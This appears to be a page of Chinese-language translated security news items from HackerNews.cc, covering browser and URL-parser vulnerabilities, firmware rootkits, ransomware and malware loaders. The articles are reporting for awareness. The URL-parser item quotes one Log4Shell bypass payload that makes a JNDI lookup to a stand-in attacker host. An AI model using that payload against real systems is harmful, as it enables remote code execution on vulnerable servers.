Zoe

o(* ̄▽ ̄*)ブ

苹果 Safari 浏览器漏洞允许跨站点用户跟踪

Hackernews 编译,转载请注明出处: 在苹果 Safari 15的 IndexedDB API 实现中放入的一个软件漏洞可能被恶意网站利用,以追踪用户在网络浏览器中的在线活动,更糟糕的是,它还可能泄露用户的身份。 2021年11月28日,防欺诈保护软件公司 FingerprintJS 向 iPhone 制造商报告了这一漏洞。 IndexedDB 是 web 浏览器提供的一个低级 JavaScript 应用程序编程接口(API) ,用于管理结构化数据对象(如文件和 blob)的 NoSQL 数据库。 “像大多数 web 存储解决方案一样,IndexedDB 遵循同源策略,”Mozilla 在其 API 文档中指出。”因此,尽管您可以访问域内存储的数据,但不能访问跨不同域的数据。” 同源是一种基本的安全机制,它确保从不同的来源(即方案(协议)、主机(域)和 URL 的端口号等)检索到的资源彼此隔离。这实际上意味着“ http [ : ]/example [ . ]Com/”和“ https [ : ]//example [ . ]Com/”并不是同一个来源,因为它们使用不同的方案。 通过限制从一个来源加载的脚本与另一个来源的资源进行交互的方式,用于隔离潜在的恶意脚本,通过预防流氓网站运行任意的 JavaScript 代码来读取来自另一个域的数据(比如电子邮件服务),来减少潜在的攻击载体。 但是 Safari 在 iOS、 iPadOS 和 macOS 中处理 IndexedDB API 的情况并非如此。 “在 macOS 上的 Safari 15,以及 iOS 和 iPadOS 15上的所有浏览器中,IndexedDB API 都违反了同源政策,”Martin Bajanik 在一份报告中写道。每当网站与数据库交互时,在同一浏览器会话中的所有其他活动框架、标签和窗口中都会创建一个具有相同名称的新(空)数据库 这种侵犯隐私的后果是,它允许网站知晓了用户在不同的选项卡或窗口中访问的其他网站,更不用说准确识别像 YouTube 和 Google Calendar 这样的谷歌服务上的用户,因为这些网站创建了 IndexedDB 数据库,其中包括经过验证的谷歌用户 id,这是一个识别单个谷歌账户的内部标识符。 “这不仅意味着不受信任或恶意的网站可以知道用户的身份,而且还可以知道同一用户使用的多个独立账户,”Bajanik 说。 更糟糕的是,如果用户在浏览器窗口的同一个标签内访问多个不同的网站,这种泄漏还会影响 Safari 15的隐私浏览模式。我们已经联系了苹果公司,希望得到进一步的评论,如果得到回复,我们将更新相关报道。 “这是一个巨大的漏洞,”谷歌 Chrome 开发者杰克 · 阿奇博尔德在推特上写道。”在 OSX 上,Safari 用户可以(暂时)切换到另一个浏览器,以避免其数据跨源泄漏。iOS 用户没有这样的选择,因为苹果(Apple)禁止其它浏览器引擎。” 消息来源:TheHackerNews,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

研究人员在十几个广泛使用的 URL 解析器库中发现了 bug

 Hackernews 编译,转载请注明出处: 研究员在对16种不同的URL解析库进行研究时发现了不一致和混淆,这可能被用来绕过验证,并且易受到黑客的攻击。 在一项由网络安全公司 Claroty 和 Synk 联合进行的深入分析中,他们在许多第三方库中发现八个安全漏洞,这些漏洞是用 C、 JavaScript、 PHP、 Python 和 Ruby 语言编写的,并被多个 web 应用程序使用。 研究人员在与 The Hacker News 共享的一份报告中表示: “ URL 解析中的混乱可能会导致软件中出现意想不到的情况(比如 web 应用程序) ,并可能被攻击者利用来导致拒绝服务情况、信息泄露,或者可能造成远程代码执行攻击。” 由于 URL 是一种基本机制,可以请求和检索位于本地或网络上的资源,解析库阐释 URL 请求的差异可能会给用户带来重大风险。 一个典型的例子是上个月在无处不在的 Log4j 日志框架中披露的 Log4Shell 漏洞,这个缺陷的原理是这样的,即当一个易受攻击的应用程序对一个恶意攻击者控制的字符串进行日志记录时,该字符串会导致一个 JNDI 查找,该字符串连接到一个攻击者操作的服务器,并执行任意的 Java 代码。 尽管美国 Apache软件基金会安全局(ASF)很快提出了一个修复方案来解决这个问题,但是很快就发现通过”${jndi:ldap://127.0.0[.]1#.evilhost.com:1389/a}” 格式的特制输入可以绕过这个方案,再次允许远程 JNDI 查找实现代码执行。 “这种绕过原理是这样的,即两个不同的(!)URL 解析器在 JNDI 查找过程中被使用了 ,一个解析器用于验证 URL,另一个解析器用于获取 URL,并且根据每个解析器如何处理 URL 的片段部分(#) ,权限也会发生变化,”研究人员说。 具体来说,如果输入被视为一个常规的 HTTP URL,Authority 组件(域名和端口号的组合)将在遇到片段标识符时结束,而如果将其视为一个 LDAP URL,解析器将分配整个”127.0.0[.]1#.evilhost.com:1389″作为权限,因为 LDP URL 规范没有说明片段。 实际上,能够发现这八个漏洞有两个主要原因,使用多个解析器是其一,另一个原因是当库遵循不同的 URL 规范时出现不一致问题时,实际上引入了一个可利用的漏洞。 混淆中不协调的URL包含反斜杠(“\”),不规则的斜杠数量(例如, https:///www.example[.]com)或者 URL 编码数据(“%”),有的URL缺少 URL 方案,这可能被用来获得远程代码执行,甚至出现拒绝服务(DoS)和开放重定向钓鱼攻击。 发现的8个漏洞列表如下,所有这些漏洞都已经由各自的维护者解决了 Belledonne’s SIP Stack (C, CVE-2021-33056) Video.js (JavaScript, CVE-2021-23414) Nagios XI (PHP, CVE-2021-37352) Flask-security (Python, CVE-2021-23385) Flask-security-too (Python, CVE-2021-32618) Flask-unchained (Python, CVE-2021-23393) Flask-User (Python, CVE-2021-23401) Clearance (Ruby, CVE-2021-23435) “许多现实生活中的攻击场景可能来自不同的解析原语,”研究人员说。为了保护应用程序不受 URL 解析漏洞的影响,“有必要充分了解是什么解析器参与了整个过程,解析器之间的区别,它们如何解释不同的错误 URL,以及它们支持什么类型的 URL。”  消息来源:TheHackerNews,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

新型 iLoBleed Rootkit 攻击 HP 企业服务器,并携带数据擦除功能

Hackernews 编译,转载请注明出处:   我们发现一个以前未知的rootkit,它瞄准了惠普企业的Integrated Lights Out(iLO)服务器管理技术,并进行攻击,篡改固件模块并彻底清除受感染系统中的数据。 伊朗网络安全公司Amnpardaz本周记录了这一发现,这是iLO固件中第一个真实恶意软件的实例。 “iLO有许多特点使其成为恶意软件和APT组织的理想乌托邦:极高的权限(高于操作系统中的任何访问级别);对硬件的访问级别非常低;管理员和安全工具难以检测检测;大众普遍缺乏检查和/或保护iLO的知识和工具,即使在更改操作系统后,恶意软件仍能持久存在,更强的是,它能始终运行且不关闭,”研究人员说。 除了管理服务器外,iLO模块还可以广泛访问服务器上安装的所有固件、硬件、软件和操作系统(OS),这一事实使它们成为破坏 HP服务器的组织的理想选择,同时也使恶意软件能够在重新启动后保持持久性并在重新安装操作系统后存活。然而,用于渗透网络基础设施和部署数据清洁器的确切操作方式仍然未知。   名为iLOBleed的rootkit自2020年开始用于攻击,其目标是操纵大量原始固件模块,以秘密阻止固件更新。具体地说,对固件例程所做的修改仿造了固件升级过程——据称显示了正确的固件版本并添加了相关日志——而实际上没有执行更新。 研究人员说:“仅此一点就表明,这种恶意软件的目的是成为一个具有最大隐秘性的rootkit,并躲避所有安全检查。”“通过隐藏在最强大的处理资源之一(始终处于运行状态)中,能够执行攻击者发送的任何命令,而不会被检测到。”   尽管敌手身份不明,但Amnpardaz将该rootkit描述为可能是高级持续威胁(APT)的手笔,APT是一个民族国家或国家赞助的团体,使用连续、秘密,以及复杂的黑客技术,以获得对系统的未经授权的访问,并在设备内部长时间停留而不引起注意。 如果有什么不同的话,黑客技术的进步再次将固件安全性纳入了关注的焦点,这就需要及时应用制造商提供的固件更新以降低潜在风险,将iLO网络与操作网络分开,并定期监控固件是否存在感染迹象。 研究人员指出:“另一个重要的问题是,有一些方法可以通过网络和主机操作系统访问和感染iLO。”“这意味着,即使iLO网络电缆完全断开,仍有可能感染恶意软件。有趣的是,就算不使用iLO,也无法完全关闭或禁用iLO。”   消息来源:TheHackerNews,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

eCh0raix 勒索软件攻击激增,QNAP NAS 设备受到攻击

Hackernews 编译,转载请注明出处: QNAP网络连接存储(NAS)设备的用户报告了eCh0raix勒索软件(也称为QNAPCrypt)对其系统的攻击。 这一特定恶意软件背后的攻击者在圣诞节前一周左右加强了攻击力度,用管理员权限控制设备。 圣诞节前攻击次数增加 BleepingComputer 论坛用管理QNAP和Synology NAS系统的用户定期报告eCh0raix勒索软件攻击,但是在12月20日左右,才有众多用户开始披露事件。 ID勒索软件服务记录了攻击数量的激增,提交的申请在12月19日开始增加,到12月26日逐渐减少。   目前尚不清楚最初的感染媒介。一些用户说他们行事鲁莽,没有好好保护设备(例如,通过不安全的连接将其暴露在互联网上);其他人则声称QNAP照片站中存在一个漏洞,使得攻击者有机可乘。 是的,我知道我是一个彻底的白痴,因为我把设备暴露给了这种类型的黑客,但我并没有认真对待这些。我一直以为没人想要攻击它,我要立马说我错了! 无论攻击路径如何,eCh0raix勒索软件攻击者似乎在管理员组中创建了一个用户,这使他们能够加密NAS系统上的所有文件。 QNAP用户(其中一些用户出于业务目的使用NAS设备)在 BleepingComputer论坛说该恶意软件对图片和文档进行了加密。 除了攻击次数激增外,这场攻击中最突出的是,攻击者错误地输入了赎金通知的扩展,并使用了“.TXTT”扩展。     虽然这并不妨碍查看说明,它可能会给一些用户带来问题,用户必须用特定的程序(如记事本)指示操作系统打开文件或将其加载到上述程序中。 BleepingComputer发现,在最近的攻击中,ech0raix勒索软件的要求从0.024比特币(1200美元)到0.06比特币(3000美元)不等。有些用户别无他选,不得不付钱给黑客来恢复他们的文件。   需要注意的是,有一个免费的解密器,用于应对旧版本(2019年7月17日之前)的eCh0raix勒索软件。然而,没有免费的解决方案来解密被最新版本的恶意软件(版本1.0.5和1.0.6)锁定的数据。 使用eCh0raix/QNAPCrypt的攻击始于2019年6月,此后一直持续威胁用户。今年早些时候,QNAP提醒用户注意另一波针对带有弱密码设备的eCh0raix攻击。 用户应该遵循QNAP的建议,以确保对其NAS设备和存储的数据进行适当的保护。   消息来源:BleepingComputer,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

个人隐私保护搜索引擎 DuckDuckGo 更受青睐

Hackernews 编译,转载请注明出处: 注重隐私的搜索引擎 DuckDuckGo 增长迅速,该公司平均每天搜索查询超过1亿个,在2021年间增长了近47%。 与其他搜索引擎不同,DuckDuckGo说他们不会跟踪你在其他网站上的搜索或行为。DuckDuckGo搜索页面构建的用户配置文件不是用于显示个性化广告,它显示的广告是基于搜索的关键字。 这意味着,如果您在DuckDuckGo上搜索电视,该搜索查询将不会用在您访问的每个其他网站上。 此外,为了建立他们的搜索索引,搜索引擎使用DuckDuckBot蜘蛛来抓取网站并从合作伙伴(如维基百科和Bing)接收数据。然而,他们并不使用谷歌的数据建立索引。 DuckDuckGo显示出快速增长 虽然谷歌仍然是主要的搜索平台,但DuckDuckGo的年增长率依然令人印象深刻。 2020年,DuckDuckGo 共收到236亿条搜索查询,截至12月底,每天平均收到7900万条搜索查询。 在2021,DuckDuckGo收到346亿个总搜索查询(截至目前),平均每天有1亿个搜索查询,显示了46.4%的增长。 虽然DuckDuckGo的增长相当可观,但它仍然只占总市场份额的2.53%,雅虎占3.3%,必应占6.43%,谷歌占美国搜索引擎流量的87.33%。 然而,随着人们不断地对谷歌、Facebook、微软和苹果等科技巨头使用用户数据的方式感到失望,我们可能会看到更多的人转向关注隐私的搜索引擎。 为了进一步帮助用户保护他们的隐私,DukDukGo发布了一个电子邮件转发服务,在2021被称为“电子邮件保护”,它没有电子邮件跟踪器,并允许用户保护其真实的电子邮件地址。 他们还推出了“Android应用程序跟踪保护”,阻止在应用程序中来自谷歌和Facebook的第三方跟踪程序。 最近,DuckDuckGo宣布他们将发布一款DuckDuckGo桌面隐私浏览器,该浏览器将不基于Chromium,而是从头开始构建。 “没有复杂的设置,没有误导性的警告,没有隐私保护“级别”——只有强大的隐私保护,在默认情况下,可以跨搜索、浏览、电子邮件等进行保护,”最近一篇关于DuckDuckGo的博文说道。 “它不是一个“隐私浏览器”;它是一个尊重您隐私的日常浏览应用程序,因为现在是阻止公司监视您的搜索和浏览历史的最佳时机。” 对于那些希望拿回数据控制权并为搜索行为增加更多隐私的人来说,DuckDuckGo可能是最适合搜索引擎。   消息来源:BleepingComputer,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

恶意软件 Blister 秘密潜入 Windows 系统

Hackernews 编译,转载请注明出处: 安全研究人员发现了一个恶意攻击活动,该攻击活动借助有效的代码签名证书将恶意代码伪装成合法的可执行文件。 研究人员称之为Blister的有效载荷,充当其他恶意软件的加载程序,它似乎是一种新的威胁,具有较低的检测率。 Blister背后的攻击者一直依赖多种技术来监视他们的攻击,使用代码签名证书只是他们的伎俩之一。 签名、盖章、交付 Elastic搜索公司的安全研究人员发现,自9月15日以来,无论是谁幕后操纵着Blister恶意软件,都至少已经开展了三个月的活动。 攻击者使用了8月23日起有效的代码签名证书。它是由数字身份提供商Sectigo为一家名为Blist LLC的公司发行的,其电子邮件地址来自一家俄罗斯提供商Mail.Ru。 使用有效证书对恶意软件进行签名是攻击者多年前就会的老把戏。当时,他们常常从合法公司窃取证书。如今,攻击者要求使用他们所感染的公司或前线业务的详细信息获得有效的证书。 在本周的一篇博客文章中,Elastic表示,他们负责地向Sectigo报告了被滥用的证书,以便Sectigo可以撤销该证书。 研究人员说,攻击者依靠多种技术使攻击不被发现。一种方法是将Blister恶意软件嵌入合法库(例如colorui.dll)。 然后通过rundll32命令,用提升后的权限执行恶意软件。使用有效的证书进行签名并使用管理员权限进行部署会使安全解决方案失效。 Elastic研究人员说,在下一步中,Blister将从资源部分解码“严重模糊”的引导代码。十分钟里,代码处于休眠状态,可能是为了躲避沙箱分析。 然后,它通过解密提供远程访问并允许横向移动的嵌入式有效载荷Cobalt Strike和BitRAT开始行动,这两种载荷过去曾被多个攻击者使用。 该恶意软件通过ProgramData文件夹中的一个副本和另一个伪造的rundll32.exe实现持久性。它还被添加到启动位置,因此它在每次启动时都会作为explorer.exe的子项启动。 Elastic的研究人员发现了Blister加载器的签名版本和未签名版本,在VirusTotal扫描服务上,这两个版本的防病毒引擎的检测率都很低。 虽然这些初始感染媒介的攻击的目标尚不清楚,但通过结合有效的代码签名证书、嵌入合法库中的恶意软件以及在内存中执行的有效负载,攻击者成功攻击的机会增加了。 Elastic创建了一个Yara规则,用于识别Blister活动,并提供IOC,以帮助组织抵御威胁。     消息来源:BleepingComputer,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

PseudoManuscrypt :一次大规模的间谍软件攻击活动

2021年6月,Kaspersky ICS CERT 专家发现了一个恶意软件,其加载程序与 Manuscrypt 恶意软件有一些相似之处,Manuscrypt 是 Lazarus APT 组织的武器库的一部分。2020年,该组织在攻击不同国家的国防企业时使用了Manuscrypt。这些攻击在报告中被描述为[“Lazarus用ThreatNeedle攻击国防工业”](https://ics-cert.kaspersky.com/reports/2021/02/25/lazarus-targets-defense-industry-with-threatneedle/)。 奇怪的是,恶意软件的数据外泄通道使用了 KCP 协议的一个实现,这个实现以前只被看作是 APT41组织工具集的一部分。 我们将新发现的恶意软件命名为 PseudoManuscrypt。 PseudoManuscryptd的加载程序通过一个 MaaS 平台进入用户系统,这个 MaaS 平台在盗版软件安装档案中分发恶意软件。具体举例,PseudoManuscrypt 下载器是通过 Glupteba 僵尸网络安装的,Glupteba 僵尸网络的主要安装程序也是通过盗版软件安装程序分发平台发布的。这意味着,使用PseudoManuscrypt的攻击者所使用的恶意软件分发策略并没有显示出特定的目标。 在2021年1月20日至11月10日期间,卡巴斯基的产品在全球195个国家的35000多台电脑上阻止了 PseudoManuscrypt 恶意软件。如此大量的受攻击系统数量并不是 Lazarus 组织或 APT 组织攻击的特点。 攻击的目标包括大量的工业和政府组织,包括军事工业复合体的企业和研究实验室。 根据我们的遥测数据,至少有7.2% 受到了PseudoManuscrypt的攻击的计算机与工业控制系统有关,而这些系统被工程、智能建筑、能源、制造、建筑、公用事业和水管理等行业的组织所使用。 主要的 PseudoManuscrypt 模块具有广泛而多样的监视功能。它包括盗取 VPN 连接数据、记录按键、截取屏幕截图和视频、用麦克风录音、盗取剪贴板数据和操作系统事件日志数据(这也使盗取 RDP 认证数据成为可能)等等。从本质上讲,PseudoManuscrypt的功能几乎为攻击者提供了对受感染系统的完全控制。     更多内容请至Seebug Paper  阅读全文:https://paper.seebug.org/1790/ 消息来源:Kaspersky,封面来自网络,译者:Zoeppo。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Windows 10 RCE:exp 就在链接中

我们通过IE11/Edge Legacy和MS Teams在Windows 10上发现了一个驱动代码执行漏洞,该漏洞由Windows 10/11默认处理程序中MS -officecmd: URI的参数注入触发。 通过其他浏览器进行攻击,受害者需要接受一个不显眼的确认对话框。或者,通过执行不安全URL处理的桌面应用程序,恶意URI也可以传递。 微软漏洞赏金计划 (MSRC) 响应不及时:起初,他们判断错误,并且完全忽略了这个问题。在我们反映后,该问题被归类为“关键,RCE”,但对其进行了分类的悬赏广告只获得了十分之一的奖励(5千美元与5万美元的差距)。他们在5个月后提交的补丁未能正确解决基本参数注入(目前在Windows 11上仍然存在)。 我们的研究过程很简单:我们决定两周内在默认的Windows10 URI处理程序中发现一个代码执行漏洞。考虑到Windows附带的URI处理程序的数量,很可能其他处理程序也可以找到漏洞。         更多内容请至Seebug Paper  阅读全文:https://paper.seebug.org/1784/ 消息来源:PositiveSecurity,封面来自网络,译者:Zoeppo。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

PYSA :双重勒索攻击的幕后黑手

Hackernews 编译,转载请注明出处: NCC集团的安全分析师报告说,2021年11月的勒索攻击增加,双敲诈不断成为攻击者武器库的有力工具。 攻击者的重点也转移到属于政府部门的实体,这些实体收到的攻击比10月份多400%。 11月的焦点显然是PYSA勒索软件组织(又名Mespinoza),该组织感染的设备呈爆炸性上升,增长了50%。 其他占主导地位的勒索软件组织是Lockbit和Conti,它们对关键实体发起了攻击,尽管数量比前几个月有所减少。 2021年3月,越来越明显的迹象表明,PYSA活动达到了威胁水平,导致联邦调查局发布了一个关于攻击者活动升级的警报。 与目前几乎所有勒索软件组一样,PYSA从受损网络中过滤数据,然后对原始数据进行加密以中断操作。 被盗文件被用作赎金谈判的筹码,攻击者威胁说,如果不支付赎金,将公开发布数据。 敲诈勒索新趋势及策略   NCC集团报告关注的另一个攻击者是Everest,一个讲俄语的勒索团伙,目前正在使用一种新的勒索方法。 只要他们的赎金要求在预计的谈判时间内得不到满足,Everest就会将受害者公司网络的访问权卖给其他黑客。 这种做法给受损实体带来了额外的麻烦,因为它们现在必须同时应对多个感染和重复攻击。 NCC 集团的报告评论道:“虽然把勒索软件当作商品售卖这一模式在过去一年中大受欢迎,但一个组织放弃勒索请求并提供IT基础设施访问权,这是一个罕见的例子——但我们可能会在2022年及以后看到模仿行为。”。 预计在12月和未来几个月内,另一个趋势是利用Log4Shell漏洞部署勒索软件有效载荷。 Conti已经致力于开发基于Log4Shell漏洞的感染链,并可能利用它对易受攻击的网络执行攻击。 勒索软件是一种不断变化的威胁,它会迅速演变为新的攻击,因此需要采取一些安全预防措施来充分防范它。     消息来源:BleepingComputer,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

Windows 注册表中隐藏的 DarkWatchman 恶意软件

Hackernews 编译,转载请注明出处: 一种名为“DarkWatchman”的新恶意软件出现在地下网络犯罪组织中,它是一种轻量级、功能强大的 JavaScript RAT(远程访木马),与C#键盘记录器配对。 根据 Prevailion 研究人员的一份技术报告,这种新型 RAT 是由讲俄语的攻击者部署的,他们的目标主要是俄罗斯的组织。 在11月初发现了DarkWatchman的第一次踪迹,当时攻击者开始通过带有恶意ZIP附件的网络钓鱼电子邮件传播恶意软件。   这些ZIP文件附件包含一个使用图标模拟文本文档的可执行文件。此可执行文件是一个自行安装的WinRAR归档文件,可以安装RAT和键盘记录器。   如果打开文件,用户将看到一条陷进弹出消息,内容为“未知格式”,但实际上,有效载荷已安装在后台。 DarkWatchman是一个非常轻量级的恶意软件,JavaScript RAT的大小只有32kb,而编译后的RAT只占用了8.5kb的空间。 它利用了大量的“LotL”二进制文件、脚本和库,并采用了隐蔽的方法在模块之间传输数据。 DarkWatchman的过人之处在于它为键盘记录器使用了Windows注册表无文件存储机制。 不再将键盘记录器存储在磁盘上,而是创建一个计划任务,以便在用户每次登录Windows时启动DarkWatchman RAT。   一旦启动,Darkwatchen将执行PowerShell脚本,该脚本使用.NET CSC.exe命令编译键盘记录器,并将其启动到内存中。 “键盘记录器作为模糊化的C#源代码分发,并作为Base64编码的PowerShell命令处理和存储在注册表中。当RAT启动时,它执行这个PowerShell脚本,该脚本反过来编译键盘记录器(使用CSC)并执行它,” Privailion研究人员Matt Stafford和Sherman Smith在他们的研究报告中解释道。 键盘记录器本身不与C2通信或写入磁盘。相反,它将其键盘日志写入一个用作缓冲区的注册表项。在其运行过程中,RAT会在将记录的击键发送到C2服务器之前清除该缓冲区。   因此,注册表不仅用作隐藏编码的可执行代码的地方,而且还用作临时位置来保存窃取的数据,直到它被提取到C2。 在C2通信和基础设施方面,DarkWatchman 的操作者使用DGA(域生成算法)和10项种子列表,每天生成多达500个域。 这给了他们卓越的生存能力,同时也使得通信监控和分析变得更具挑战性。 DarkWatchman的功能如下: 执行EXE文件(返回或不返回输出) 加载DLL文件 在命令行上执行命令 执行WSH命令 通过WMI执行其他命令 执行PowerShell命令 评估JavaScript 从受害计算机将ILE上载到C2服务器 远程停止并卸载RAT和键盘记录器 远程更新C2服务器地址或呼叫总部超时 远程更新RAT和键盘记录器 将autostart JavaScript设置为在RAT启动时运行 C2弹性域生成算法(DGA) 如果用户具有管理员权限,则会使用vssadmin.exe删除影副本 Privailion认为,DarkWatchman可能是由勒索软件集团定制的,或者是为勒索软件集团量身定做,因为它们需要为能力较弱的附属组织提供一种强大而隐蔽的工具。 该恶意软件可以远程加载额外的有效载荷,因此可以作为后续勒索软件部署的感染第一阶段。 由于DarkWatchman可以在初始感染后与攻击者控制的域通信,勒索软件操作者可以接管并部署勒索软件或直接进行文件提取。 这种方法将使分支组织的角色降级为网络渗透者,同时使RaaS操作更加实用和高效。     消息来源:BleepingComputer,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自HackerNews.cc ” 并附上原文链接